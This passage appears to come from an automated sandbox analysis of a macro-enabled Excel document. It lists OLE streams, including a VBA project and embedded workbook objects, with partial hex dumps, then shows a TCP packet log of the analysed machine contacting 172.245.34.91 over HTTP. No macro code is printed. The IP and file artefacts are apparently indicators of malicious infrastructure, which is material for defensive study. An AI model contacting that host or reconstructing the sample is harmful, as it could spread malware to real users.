File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
Stream Size:	120200
Entropy:	4.560271435258422
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD017EF322/MBD017ED236/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD017EF322/MBD017ED236/\x1CompObj
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF322/MBD017ED236/Package, File Type: Microsoft Excel 2007+, Stream Size: 7880

General
Stream Path:	MBD017EF322/MBD017ED236/Package
File Type:	Microsoft Excel 2007+
Stream Size:	7880
Entropy:	6.5489983015138815
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF322/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 151951

General
Stream Path:	MBD017EF322/Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	151951
Entropy:	7.683500296443008
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD017EF322/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	524
Entropy:	5.18268582383174
Base64 Encoded:	True
Data ASCII:	I D = " { E 6 0 3 B E 4 9 - 3 B E 4 - 4 9 D 7 - 9 5 7 C - E 1 6 A B 7 6 4 E 9 E 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F E F C F 8 9 E 0 8 A 6 A 0 A A A
Data Raw:	49 44 3d 22 7b 45 36 30 33 42 45 34 39 2d 33 42 45 34 2d 34 39 44 37 2d 39 35 37 43 2d 45 31 36 41 42 37 36 34 45 39 45 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: MBD017EF322/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: MBD017EF322/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2615

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2615
Entropy:	3.966034925838034
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 85 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: MBD017EF322/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	553
Entropy:	6.393413723460345
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bc bb 86 65 0c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Stream Path: MBD017EF323/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD017EF323/\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF323/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	MBD017EF323/\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD017EF323/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327", Stream Size: 120200

General
Stream Path:	MBD017EF323/\x5SummaryInformation
File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
Stream Size:	120200
Entropy:	4.560400140271791
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD017EF323/MBD017ED236/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD017EF323/MBD017ED236/\x1CompObj
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF323/MBD017ED236/Package, File Type: Microsoft Excel 2007+, Stream Size: 7880

General
Stream Path:	MBD017EF323/MBD017ED236/Package
File Type:	Microsoft Excel 2007+
Stream Size:	7880
Entropy:	6.5489983015138815
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF323/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 151951

General
Stream Path:	MBD017EF323/Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	151951
Entropy:	7.6835052184911135
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 08:13:05.353737116 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.475182056 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.475337982 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.476435900 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.603394032 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603449106 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603480101 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603504896 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603518009 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.603530884 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603550911 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.603557110 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603560925 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.603580952 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.603585005 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603604078 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.603611946 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603638887 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603666067 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.603737116 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.616553068 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.724899054 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.724945068 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.724972010 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.724997997 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725025892 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725059986 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725080013 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725087881 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725087881 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725099087 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725119114 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725126982 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725126982 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725140095 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725147009 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725158930 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725177050 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725186110 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725204945 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725205898 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725219011 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725231886 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725249052 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725260019 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725286961 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725311995 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725338936 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725342035 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725342035 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725363970 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725342035 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725392103 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.725393057 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725393057 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725429058 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.725440979 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.726560116 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847157955 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847219944 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847260952 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847296000 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847332001 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847367048 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847400904 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847434998 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847464085 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847466946 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847464085 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847500086 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847515106 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847531080 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847532034 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847558975 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847564936 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847580910 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847582102 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847601891 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847629070 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847657919 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847687006 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847687006 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847702980 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847719908 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847731113 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847749949 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847762108 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847774982 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847790003 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847795963 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847807884 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847819090 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847841978 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847865105 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847867012 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847891092 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847896099 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847913027 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847913980 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847929001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847939014 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847946882 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.847964048 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847985983 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.847990036 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848001957 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848010063 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848027945 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848046064 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848064899 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848088026 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848108053 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848109961 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848130941 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848130941 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848148108 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848153114 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848165989 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848182917 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848187923 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848237038 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.848423958 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848448038 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.848512888 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.851108074 CET	49173	80	192.168.2.22	172.245.34.91
